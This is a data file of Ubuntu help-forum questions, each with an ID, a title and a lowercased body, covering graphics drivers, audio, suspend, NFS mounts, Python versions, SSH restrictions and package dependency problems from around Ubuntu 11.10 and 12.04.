112426	how to install ati x1300 driver on ubuntu 11.10 x64 ?	i 'm a new ubuntu user so i do n't know very much about it.i looked some websites but i could n't make it.can someone help me ?
112427	does anyone know why the launcher will not go away ?	it is just stuck on my screen , anyone have any ideas or help would be appreciated ?
112432	chromium 19+ for ubuntu	i 'm looking for the repository with the latest chromium 19+ build for ubuntu because `` ppa : chromium-daily/dev for the daily builds channel is not up to date . ( the current version is 18 ) '' . this is n't maintained anymore . ( the latest update is from january , which of course does n't looks like daily build , right ? ) update : i 'd written some bash script to upgrade cromium http : //paste.ubuntu.com/1110824/
112434	is there a real name policy in the ubuntu community ?	i 'm not ashamed to be a part of ubuntu , but i 'm trying to keep the number of web search hits for my real name low , which is kinda impossible if you use a launchpad account . so , i 'm wondering if there is a real name policy in the ubuntu community , or if it 's okay to use a pseudonym/nick name/fake name ? while it might be okay to use nick names on irc and in forums , how about these topics : adding an openpgp key to launchpad . signing the ubuntu code of conduct . becoming an ubuntu member . code contributions ( e.g. , signing the canonical cla ) . thanks in advance for your answers !
112436	tool for cleaning installed fonts	i have have installed too much fonts ( 11.10 ) ; now my system is very slow ( memory full , etc. ) . does a tool exist in order to clean my mess up ?
112443	drivers for sony vaio vgn-fs920	i just installed ubuntu 11.10 on a sony vaio vgn-fs920 . i need to know how to install drivers for the touchpad and basicaly general operating drivers . i know you can go to sony 's site and get them but they are all for windows xp . what can i do . i really like ubuntu and i think it is the best system for this older model computer . it just has some bugs with it that i think are caused because i need new drivers . thank you for any help .
112445	how do i open more than one nautilus explorer when there is one already opened ?	why can i not open a second or third window , and so on , to view directories and files ? if i click the home folder button the same nautilus window keeps showing up .
112448	how to configure ( brother ) laser scanner	i am not able to configure the scanner of my brother dcp-7030 . after following all the steps mentioned on brother website also , i implemented the solution provided in ubuntu forums when i try to scan the documents , the printer shows the display `` connecting to pc '' , but does not scan the document . i am however able to print the documents . any solution is much appreciated .
112451	ubuntu 11.10 nvidia twinview display error / flash video playback lag	i am running ubuntu 11.10 with '2 ' nvidia gts-250 gpu 's . i am trying to get twinview to work . currently i have everything working as far as both screens are on and i can drag between them and use workspace switcher fine . i am having a few different issues , my assumptions lead me to believe all of them are related to the twinview display . the issues i am having are as follows : once logged in an error is displayed stating : `` could not apply the stored configuration for monitors . none of the selected modes were compatible with the possible modes : trying modes for crtc 351 crtc 351 : trying mode 3840x1200 @ 50hz with output at 1920x1080 @ 50hz ( pass 0 ) crtc 351 : trying mode 3840x1200 @ 50hz with output at 1920x1080 @ 50hz ( pass 1 ) at this point all system and application windows & font are really large including the desktop text . all i do is close out of this error . and the font and window size issues are gone . seems like the display quickly refreshes when i close out of this error . ( not sure what happens that quick fixes the issue , until i need to logout and back in of course . ) any videos streamed through any browser do not work fully . it lags and chops up a bit . not sure if this is a flash issue or not . i currently have flashplugin-installer 11.1.102.63 installed from the software center . i have read about an issue with the current version of flash and `` gnash '' causing issues . double checked , i do not have gnash installed . i 'm gon na try and think ahead here of any possible file or setting anyone would need to see to help with this issue : i posted my current xorg.conf file and results of xrandr command here : http : //pastebin.com/zty74xg6 my setup consits of the 2 nvidia gts-250 gpu 's . both monitors are connected to the same ( first ) gpu card . the monitors in use are an lg-47 led and a samsung-24 lcd . just a standard left ( default-lg ) display -- > right ( secondary-samsung ) display the nvidia driver i have installed is from the additonal drivers panel , the nvidia accelerated graphics driver ( version current ) [ recommended ] . the other option listed is the ( post-release updates ) ( version current-updates ) . i have a fully updated os with nothing out of the ordinary software running outside of compiz . i never had these issues before i setup twinview but i do vaguely remember having to uninstall and reinstall flash around when i setup twinview . just to provide some more detail : if i attempt to go into displays , it only detects 1 large unknown monitor with a resolution of 3840x1200 and wont allow for any changes ( i thought this was normal being that i was led to believe to only utilise the nvidia x-server settings . the x server settings gui shows the following ( relevant info ) : operating system : linux-x86_64 nvidia driver version : 295.20 xserver display config : ( gui ) shows the lg and samsung monitors in the correct positions . configuration : twinview resolution : auto position : absolute ( only difference is the samsung display position is : +1920+0 ) panning : lg-1920x1080 samsung-1920x1200 i hope i have explained this well enough in detail . i 'm honestly not worried about the display issues and error message once logged in . easy enough to just close it out and act like it does n't happen ( unless you believe they are somehow related ) . the only reason i included all the details with that is i do believe the issues are related . for the past 2 days i have researched issues online and found a ton of workarounds for twinview to work display properly ( assuming this is causing the flash video issues . ) i have followed a few different tutorials for twinview and nvidia drivers all of which did n't correct the issue or left me unable to boot ( had to boot to recovery console and restore old versions of files i modified during the various tuts to allow boot to desktop ) ( good thing i backed them all up 1st : ) ) my main concern is to allow videos to stream and play properly without lag and screen chop/flickering . thanks for all the help . let me know if you need me to provide any more info , i 'll be here waiting the whole night = ) update : uninstalled and reinstalled the same flash-plugin i had installed before from the software center . still the same issues . ( starting to think it may not be a flash issue . i feel silly saying this but , the only fix i know with flash is to uninstall and reinstall lol )
112454	disabling middle button on apple magic mouse	i was able to successfully install my apple magic mouse into my installation of ubuntu 11.10 out of the box , and i am happy with that ! thanks , ubuntu , for supporting the apple magic mouse out of the box . however , i notice that the magic mouse has a very irritating behavior -- when you click the `` middle button '' , it pastes the clipboard contents into the editor . this is problematic because the `` middle button '' is not clearly defined on the multi-touch mouse interface . is there a way of disabling the `` middle button '' behavior altogether on the apple magic mouse without disabling any of the other behaviors , such as scrolling , etc. ? i would appreciate your response ! thanks !
112455	megaraid sas raid controller	i have about half a dozen servers all running the intel rs2bl080 raid controller on oneiric server amd64 . it works fine using the megaraid_sas kernel module but when i try to use megacli to probe the card , it tells me that there are no raid controllers available . intel do n't have ubuntu as a supported os , so they could n't help me . after looking around , i have found referenced of this megaraid controller working fine for other people . just reaching out to anyone that might know what i am doing wrong . $ megacli -adpcount controller count : 0 . exit code : 0x00 $ megacli -v megacli sas raid management tool ver 8.02.16 july 01 , 2011 ( c ) copyright 2011 , lsi corporation , all rights reserved . exit code : 0x00 $ lspci -vv 09:00.0 raid bus controller : lsi logic / symbios logic megaraid sas 2108 [ liberator ] ( rev 05 ) subsystem : intel corporation raid controller rs2bl080 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 32 bytes interrupt : pin a routed to irq 16 region 0 : i/o ports at 3000 [ size=256 ] region 1 : memory at d8040000 ( 64-bit , non-prefetchable ) [ size=16k ] region 3 : memory at d8000000 ( 64-bit , non-prefetchable ) [ size=256k ] [ virtual ] expansion rom at d8500000 [ disabled ] [ size=256k ] capabilities : [ 50 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 68 ] express ( v2 ) endpoint , msi 00 devcap : maxpayload 4096 bytes , phantfunc 0 , latency l0s < 64ns , l1 < 1us exttag+ attnbtn- attnind- pwrind- rbe+ flreset+ devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag- phantfunc- auxpwr- nosnoop+ flreset- maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 5gt/s , width x8 , aspm l0s , latency l0 < 64ns , l1 < 1us clockpm- surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x8 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : range bc , timeoutdis+ devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : 5gt/s , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -6db capabilities : [ d0 ] vital product data unknown small resource type 00 , will not decode more . capabilities : [ a8 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ c0 ] msi-x : enable+ count=15 masked- vector table : bar=1 offset=00002000 pba : bar=1 offset=00003800 capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes+ tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr- cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap+ cgenen- chkcap+ chken- capabilities : [ 138 v1 ] power budgeting < ? > kernel driver in use : megaraid_sas kernel modules : megaraid_sas
112456	how to troubleshoot a slow wireless connection ( step by step ) ?	i am looking for a standard approach to troubleshooting slow wireless connections , regardless of what card or wireless router you have . pings to the gw in a simple network less than 10 ft away should yield 1-2ms max . not the case here . what are the first steps anyone would start to troubleshoot this slowness ? considering i have the best newest laptop and best newest wirelss router in the world , and the top rated best newest wireless card onboard my laptop . what would you do first ? please list in this format : yadda.. more stuff ... ... more yadda stuff i will not bore you with what i have tried ; i have done the basics , but maybe i can learn something new . so i am open for a simple how-to . i am using amd64 10.04 lts . here is an example ping i am experiencing : ping 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . 64 bytes from 4.2.2.2 : icmp_seq=1 ttl=56 time=59.4 ms 64 bytes from 4.2.2.2 : icmp_seq=2 ttl=56 time=14.3 ms 64 bytes from 4.2.2.2 : icmp_seq=3 ttl=56 time=186 ms 64 bytes from 4.2.2.2 : icmp_seq=4 ttl=56 time=115 ms ^c -- - 4.2.2.2 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3004ms rtt min/avg/max/mdev = 14.358/93.823/186.334/64.251 ms its been great hearing 1 response , very cool info , i just added more input to persuade you/those viewing that i have done some basics , to assist in response to my quest for a step by step approach to completion . as for the `` garbled pastes , welp , the interface didnt allow me much room to edit it , ex : when i hit the enter key to create a new paragraph , it took that as i was done . so the input methods defined in this page needs a little more tuning i would suggest . lastly , i am still experiencing slow speeds/varied speeds . therefore i would like more input , possibly from new individuals , second opinions are always welcomed as there are hundreds of cmd utils i have yet to explore for this issue . i can say it might be the frames in ifconfig possible as culprit and documentation points to drivers , as yes , these are broadcom restricted drivers . any wizards about ? i would like to hear from you all , and wish to use this procedure on help.ubuntu as somepoint giving credit where it is due .
112457	installing ubuntu on powerbook g4	i have a mac powerbook g4 . it has the mac os x version 10.5.8 on it . i would love to change it to ubuntu but the last time i tried it would n't register the disc . any ideas if i need an older version or what needs to be installed in a certain way ?
112461	i changed my python version - but it did n't `` take '' everywhere ?	free ubuntu-ers . i have a strange problem which i 've spent a while trying to debug , and later i searched fairly thoroughly for data on it , without any luck . i have a fairly new server running lucid lynx and i 'm attempting to switch the default python version to 2.7 . i 've tested all the apps that i 'm running and they seem to run well on 2.7 - and it 's not a mission-critical server , so i can fail and back out if i like . i did my homework , installed 2.7 , changed the soft links in /usr/bin , and edited my /usr/share/python/debian_defaults to make the default-version python2.7 . then i tried `` python '' from the command line for `` root '' and for `` some random user account '' and got python 2.7 and dusted my hands off . this was a couple of months ago , and all has worked fine until today ... i tried to run a python daemon - but it kept failing mysteriously . i tracked it down to a package that was n't installed - but it was ... after some debugging , i discovered that in fact when i run a python script as a daemon , it 's running python 2.6.5 - but if i run the same script from the command line , it 's running python 2.7.2 - and i of course have n't installed the new library for python 2.6 . ( i 'm using the python daemon library to launch the script as a daemon ... ) but my scripts all start with # ! /usr/local/bin/python , the version i recently installed , and /usr/local/bin/python -- version returns 2.7.2 . in fact , i changed the # ! line to explicitly point to python 2.7 and it still fails in exactly the same way . later , i discovered if i ran the program in pdb , the python debugger , i also get 2.6 as the version . i think the key is that neither pdb nor the daemon runner pay any attention to the # ! line - but i ca n't get any further than that . your kind help is gratefully solicited . edit : some good suggestions below - if my stackoverflow karma reached here , i 'd upvote them - but no good results ( see comments below ) . resolution : dump python 2.6 .
112463	ubuntu 11.10 login failure	i had an old install of 11.10 that i decided to reinstall using the same home folder . so , i reinstalled 11.10 and copied back my entire home folder including configurations . i then decided to use my packages list from synaptic to reinstall all of my old applications and packages . now , upon booting up , i ca n't select anything from the login settings for shell ( ubuntu2d , gnome , etc . ) because it is an empty box , and logging in on either my username or guess yields a screen similar to what you see when you shutdown , listing ok or fail for my hardware . it then will go right back to the login screen . i tried deleting .xauthority with no results . any ideas ? startx yields this : here 's what i got : _xservtranssocketunixcreatelistener : ... socketcreatelistener ( ) failed _xservetransmakeallcotsserverlisteners : server already running fatal server error : can not establish any listening sockets - make sure an x server is n't already running please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log invalid mit-magic-cookie- ! keyxinit : giving up xinit : unable to connect to x server : connection refused xinit : server error
112468	random freezes in ubuntu 11.10	i have read every single post about system freezes , but can not find my exact problem . basically , ubuntu 11.10 is randomly freezing . when it happens , i can not do anything , not even move the mouse . everything is locked up , even the keyboard is not responding ( num lock does nothing ) . i noticed that the cpu fan starts to spin faster when the system freezes , but i verified that the cpu temp is ok just a moment before the freeze , so it 's not that . my system was working ok one week ago , after using it for more than two months . now , suddenly , i started getting this problem , it happens several times a day . seems to me that it was just after installing some ubuntu updates , that included the 3.0.0-16-generic-pae kernel , flash plugin , and some other packages . what i did to try to troubleshoot : looked in the different logs , none reflect anything at the time of the freeze . used the previous kernel version selecting it from grub ; the freezes still happen . uninstalled firefox as i initially thought it was related ( it was acting weird ) . still happening . i ran the memtest86 , it passes ( executed only one pass ) . used windows 7 for several hours just to see if there 's any problem there . no freezes or crashes at all . i tested during one entire session without opening any web browser , just to not use flash or anything . still freezing . i say it 's random because i do n't seem to find any sequence of steps that lead to a freeze . it can be on battery or plugged , while doing something or while doing nothing . got the freeze while watching a flash video . got the freeze while using eclipse or while using gedit ( to look at the logs ! ) . anything basically , does not seem to matter . how can i further troubleshoot ? the logs do n't seem to help , i guess nothing is getting logged . this problem is really frustrating . while everything else ( including drivers , programs , unity ) works flawlessly , this is making the system almost unusable , i know i can lose my work at any point . thanks for any help !
112473	audio not working for gnome screencast ctrl + alt + shift + r	i can do screencasts by pressing ctrl+alt+shift+r , but i get no sound when i view the videos , i 've check my built in mic and headset , they both work on skype and such , i just ca n't record sound with the gnome built in screencasting . also , when i open the videos in movieplayer they are in mute by default and there 's nothing the the preferences i can find to change that . any help would be awesome !
112474	zsyncs for precise beta 1 cd isos	where are the zsync files for the cd-sized isos ( such as desktop-i386 ) for the precise beta 1 ? they do n't seem to be in the expected location at http : //cdimage.ubuntu.com/releases/12.04/beta-1/
112477	suspend hangs on 11.10 - need help debugging	i have an asus x53sd laptop i just bought . i deal with a lot of linux development , so i prefer to have ubuntu running as my primary os . i have a fresh install of 64bit 11.10 with just `` bumblebee '' and the latest 'nvidia-current ' drivers installed as found in the tutorial here : https : //wiki.ubuntu.com/bumblebee the problem is , whenever i shut my laptop lid or suspend manually , the screen dims black and the hard disk light is on but it never turns off . it just hangs . i waited an hour before the laptop battery just went dead hoping it will just do something . i have to force it off and turn it back on - but dmesg is cleared at that point . i need help debugging the problem . i have a suspicion it has to do with bumblebee . anyone else have similar problems with asus laptops with similar hardware ? thanks here are the specs : intel core i7-2670qm ( with hd graphics ) 8gb ram nvidia 610m ( 2gb dram ) lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation device 1058 ( rev ff ) 03:00.0 network controller : intel corporation centrino wireless-n 100 04:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 05:00.0 ethernet controller : atheros communications ar8151 v2.0 gigabit ethernet ( rev c0 )
112478	why lspci outputs the wrong id of my discrete graphics card ?	in an optimus enabled laptoto ( dell xps 15 l502x ) i have a discrete graphics card ( gt525m ) and when running nvidia-settings , one can confirm it : yet , the command : lspci -vnnn | grep vga outputs the following : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108 [ geforce gt 540m ] [ 10de:0df5 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) the lspci command tells us the discrete card is gt540m and not gt525m . by no means i overclocked the card . or does it mean the card comes undercocked . i ca n't tell . a bug maybe ? while , before upgrading to 12.04 , under 11.10 the same command did output gt525m .
112481	horribly bad static in ubuntu 11.10	i 've searched around the askubuntu site and no seems to be having a similar issue . everyone 's having problems with skype , etc.. me ? i 'm just having a problem with really bad microphone static . i uploaded an example of it to youtube to give you an idea ... ( brace your ears ! ) http : //youtu.be/3fwxrr3kuhu what could be causing this . it is nothing like this in windows 7 or 8 . just ubuntu . had n't really noticed it until today , because today was the first time i tried to use skype on ubuntu , and nearly blew out my friends eardrums ! please help !
112482	back up virtualbox for a fresh install - while migrating to 64 bit	i usually take the upgrade path in ubuntu , rather than fresh install , but i 'd like to try the latter route for 12.04 . however , one of the most thoroughly configured and critical tools on my system is the virtualbox windows virtual machine that i run for some key tasks i have not yet been able to move entirely to linux . how can i ensure that i completely back this up when i wipe and install for 12.04 ? will it be in exactly the current state ? which files will i need to back up to guarantee all settings and content transfer correctly ? also , a major part of my motivation in doing a fresh install is that i intend to go from a 32-bit 11.10 to a 64-bit 12.04 setup . will this affect/break my virtual machine ?
112491	hard-drives are not detected by ubuntu livecd or installation	i 'm reposting my question 'cause it seems the previous is alreadt forgotten . i can boot to windows 7 normally . however in ubuntu - i can not boot . when using a ubuntu live cd , i can not see my drives in gparted or disk utility . launching nautilus - no drives are seen any ideas ?
112493	compiz not drawing window controls	i have recently installed driver for my ati graphic card in my dell studio laptop . i have also read this somewhere on the web that ubuntu enables compiz window manager by default if your hardware can run it . is it true ? in my case before installing graphic card driver the window manager was metacity , but now i have compiz as my window manager . i found this out uisng displex indicator applet also confirmed by wmctrl -m. from the time i have installed graphic card drivers , the window manager ( compiz ) is not drawing window control buttons for some of the windows . for example if i open a terminal i have to close it using key board shortcuts or use the file - > quit option in app-menu . also i am not able to move the window because of this . from then when-ever i find a window without window control buttons i am restarting the window manager using displex indicator applet . but this is very annoying and also consumes a lot of time ( when i am doing my work ) . can any one suggest any solution for this . what are up 's and down 's of using compiz vs metacity .
112496	how do i install a minimal ubuntu - no desktop needed ?	i keep having to re-install ubuntu after trying advice . this is very frustrating . all i want is to boot to a linux command prompt . please help !
112498	checking battery state errors	first of all , i 'm going to need very specific answers for i switched to linux from windows a week ago and do n't know much . basically when ubuntu starts it hangs on `` checking battery state '' . i 'm on a desktop , not a laptop . if i do ctrl+alt+f5 and `` sudo reboot '' about 2 or 3 times it will eventually boot into ubuntu , but this is quite frustrating . any detailed help would be very appreciated .
112505	exactly what are these 2 error messages telling me ?	heimdall is program used for rooting a samsung galaxy s ii phone ( and other android phones ) . when i attempt to open ( with the gdebi package installer ) the heimdall frontend 1.3.1 binary for debian linux ( amd64 / intel 64 ) , i get this error message : error : dependency is not satisfiable : heimdall ( > = 1.3.0 ) i also get the following error message when i try to open ( again with the gdebi package installer ) the heimdall 1.3.1 command line binary for debian linux ( amd64 / intel 64 ) : error : dependency is not satisfiable : libusb-1.0-0 ( > = 2:1.0.8 ) what do i need to do so as not to get these error messages . i 'm running 64-bit karmic , but others running ubuntu 11.10 are getting similar messages .
112507	the relationship between terminal and the process	mostly , if i closed the current terminal , the sub_process are also closed . of course , if i use suspend the process and use `bg jobid wakeup it , the process is divided with the terminal and run in background . so what the relationship between the current terminal and the process that is triggered by the terminal . are they father-son or brothers ? what 's more , how could i use the command line to trigger a process which need n't attach to the terminal .
112512	ubuntu refuses to output audio via hdmi	i have my pc hooked up to speakers and a monitor . in addition it is hooked up to my vizio 37 ' lcd telivision . when i was on windows 7 i could choose to output sound via hdmi . i have the choice in ubuntu but no sound is outputted . any ideas ? i do n't know how to get system specs on ubuntu so if you need them please tell me how to get them . ps . sorry for the horrible grammar , it 's 2:15 in the morning . aplay -l output : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc887 analog [ alc887 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : alc887 digital [ alc887 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
112516	compiling from ubuntu 12.04 using older glibc version	i am an old newbie i am learning now a operating systems course where we need to compile a program in 9.10 ubuntu . this program is not running as expected on further releases of ubuntu ( such as 12.04 ) my question is how to compile a c program using the kernel of 9.10 from ubuntu 12.04 ( the newest release ) remarks : 1 ive installed an ubuntu 9.10 partition on my computer . so i can use the libraries from there . but , nevertheless , i would like to work from my 12.04 partition . 2 maybe this manual could help thanks niv
112517	why does ubuntu get slow after a period of time ?	i have used the ubuntu 11.04 for several months and it is much faster during the startup at first . but it takes much longer time to start after several months . since i have turn off the system service such as apache2 , mysql and so on and the situation does n't change , i do n't why this happens . according to the advice of some guys , i have got the chart by using bootchar ( i can not post it here because of lack of reputation ) , what should i do to shorten the startup time now ? should i stop some of them ? i do n't know how to analysis the chart .
112518	my laptop 's speaker is popping after updating ubuntu 11.10	it 's not the default alert sound . it 's literally pops that happens 3 times in a row really fast . it did n't do this earlier today , but when i updated ubuntu , the speakers started popping . it does it randomly sometimes , and it does it right before it makes a sound , like before a video or music . is there a fix to this ?
112521	how can i put 4 images on a a4 image via the console	i am working on a photo-booth installation , and i want to take 4 photos ( this i have figured out ) , and then combine them so they are on a a4 paper sheet ready to be printed . i need to do this through the console , so i can automate the whole process . i have looked at http : //www.imagemagick.org/script/index.php , but i can only figure out how to overlay the images .
112528	does ubuntu run on current asus transformer prime ?	i 've read instructions about dual boot android / transformer prime ( a significant factor in ordering one ) . also about not working with /latest/ transformer prime ( firmware / bios ? ) also about imminent ubuntu arm support . will i be able to run ubuntu in a day or two when transformer arrives ? also , am i right to assume i can restore transformer to factory status if i break something in the attempt ?
112529	how do i enable mobile networking by default ?	i use a usb-modem to connect to my pc to the internet . but every time i connect it via usb , i have to enable mobile broadband via the networking applet on the task bar . i know it 's not much work to do but i want it enabled by default so that it 'll connect to the internet automatically .
112536	importing radiotray radio stations into rhythmbox	radiotray icon applet is pretty neat and comes with a variety of predefined radio stations ordered by categories . to those i also added some additional local ( israeli ) radio stations and ended up with few dozen . in preparation for the coming precise and the need to have one player for all , i would like to migrate this list to rhythmbox . the only thing i figured out so far is that the radio stations of radio tray are being kept in an xml file at @ home/.local/share/radiotray/bookmarks.xml . any ideas how to import radiotray stations into rhythmbox ?
112541	nfs mountpoint named `` share '' breaks ls and man	i mounted a nfs server to ~/share . this works fine as long as i 'm at home , where the nfs share is in reach . whenver i 'm not , this seems to break access to all manpages . using man ( or ls in my homedir ) waits forever . checking with strace reveals that they try to access the folder called share . unmounting fails too . even with -l ( lazy ) and -f ( force ) . i am asking for three things here : is `` share '' a magic name ? does something like manpath exist , which i should avoid ? how do i unmount without rebooting ? ( i already commented the share out in fstab ) what would you suggest me to do , to have network/position based mounting of nfs shares ?
112543	using xampp in ubuntu while installing it in fedora	i have downloaded and installed xampp for linux 1.7.7 in fedora where it is running perfectly fine . i also want it in ubuntu but donot want to giv up the disk space for installation once again but mount the folder /opt/lampp from fedora to /op/lampp in ubuntu . i can mount it by using sudo mkdir /opt/lampp & & sudo mount -- bind '/media/_fedora-16-i686-/opt/lampp ' /opt/lampp and on running sudo /opt/lampp/lampp start from ubuntu i get starting xampp for linux 1.7.7 ... xampp : starting apache with ssl ( and php5 ) ... xampp : starting mysql ... xampp : could n't start mysql ! xampp : starting proftpd ... xampp for linux started . on running localhost on web browser i cant get past the splash page . how do i make this happen , so that i can do the same development from both the os .
112545	libglx.so is not a symbolic link	i 've just installed the nvidia driver , and even if now the driver is correctly working , during installation i got `` error : file '/usr/lib/xorg/modules/extensions/libglx.so ' is not a symbolic link. '' . i need to solve this issue , anyone can tell me which module libglx.so shall be linked to ? thank you !
112547	i ca n't switch from one window to another	hello fine gentlemen , i have the following problem and i primarily want to have a way how to analyse this . my problem is that somehow ubuntu keeps locking me in a certain window/editor . i can then not switch to another one using the mouse or keyboard . i can however close the window , giving the focus to another window . i can : move the cursor within the window that contains the focus write in the window that has the focus click in window that has the focus click on another window , wait some time and it will switch to the new window . i ca n't : switch to another window at my convenience reproduce the problem because it just comes and goes fix the problem via a restart , so it should not be processor load how can i figure out why this is happening ? how can i possibly fix it ? what additional information do i need to specify the problem , so i can look for a solution ? edit 1 : i am using the latest version of ubuntu ( ubuntu 10.04 lts - the lucid lynx ) how do i find out my desktop environment ?
112548	rmagick install problem	i ca n't install rmagick because of the following dependency problem after trying sudo apt-get install libmagick9-dev ( required according to this ) on ubuntu 10.0.4 : note , selecting libmagickwand-dev instead of libmagick9-dev some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libmagickwand-dev : depends : libmagickwand2 ( = 7:6.5.7.8-1ubuntu1.1 ) but it is not going to be installed depends : libmagickcore2-extra ( = 7:6.5.7.8-1ubuntu1.1 ) but it is not going to be installed depends : libmagickcore-dev ( = 7:6.5.7.8-1ubuntu1.1 ) but it is not going to be installed trying to apt-get install libmagickwand2 , i get this : > the following packages have unmet dependencies : libmagickwand2 : > depends : libice6 ( > = 1:1.0.0 ) but it is not installable > depends : libjpeg62 but it is not installable > depends : libmagickcore2 ( > = 7:6.5.7.8 ) but it is not going to be installed > depends : libsm6 but it is not installable > depends : libtiff4 but it is not going to be installed > depends : libxt6 but it is not installable
112550	ubuntu 11.10 ati x1300 3d support ?	i have acer aspire 5100 and graphic card ati x1300.my graphic card supports 3d but ubuntu doesn't.i researched a lot but i did n't understand them.also i followed the instruction below but it did n't worked either . is my ati graphics card supported in ubuntu ? it says : '' aticonfig : no supported adapters detected '' after '' sudo aticonfig -- initial -f '' command . english is not my native language and i do n't know much about ubuntu.can someone explain it simply ?
112556	apache default website root folder	is it safe to change the appache default website root folder to somewhere in user home ? i wonder if it is okay to do . because otherwise i have to save the default site by another name and then run apache commands to disable the default site and enable mine . so why not just edit the default site and change the document root and directory to somewhere in my home .
112563	wipe windows and everything else , then install ubuntu	i 'm using a 2 year old laptop with windows vista . i want to start over and only use ubuntu . how can i wipe my entire hard disc clean , including the 2 partitions and start all over with one partition and then install ubuntu ? i want to have everything removed from my hard disc , 100 percent blank slate . can anyone please tell me how i should do this ? thanks very much ! : - )
112568	how do i allow a non-default user to use serial device ttyusb0 ?	i have an ubuntu 11.10 system with 2 users : the first was created during the installation the second instead was created after . it belongs to the sudoers group . now the problem is that when the second tries to use a device ttyusb0 the following error is returned : '' could not open serial port /dev/ttyusb0 '' i was able to fix it by using : sudo chown : second_user /dev/ttyusb0 however when i disconnect the device and reconnect it the problem comes back . is there a way to allow different users to access the devices ? i suppose i have to add the user to a specific group . currently the owner is root and the group is dialout . however i 'm not sure about the group and i do n't know how to add the user . thanks !
112574	how to give restricted access to user	i have a home pc and i created a reverse port forwarding to a server . now i would like to go access to some people to the home pc through this server . i would like to control the access of the user on this server so i added the following lines to the /etc/ssh/sshd_config match user restricteduser chrootdirectory /home/restricteduser allowagentforwarding no permitopen localhost:3333 but when i 'm trying to connect to the server ssh restricteduser @ serverip restricteduser @ serverip 's password : i 'm getting the following error : write failed : connection reset by peer
112580	gpu very limited vertex buffers ( i think that 's the problem ... )	i run ubuntu 11.10 on a dell latitude d505 with the supposedly dreaded intel 855 graphics card/processor . i am having problems with several 3d modeling programs , including blender and k-3d . whenever i try to create an object with more than around twenty vertices in either program , the program immediately quits . i suspect this to be a hardware or driver problem as two programs both suffer from this problem . i can play some 3d games , but those modeling programs do not work well . could it be something to do with not being able to allocate a large enough dynamic vertex buffer ? how might i get those modeling programs to work ?
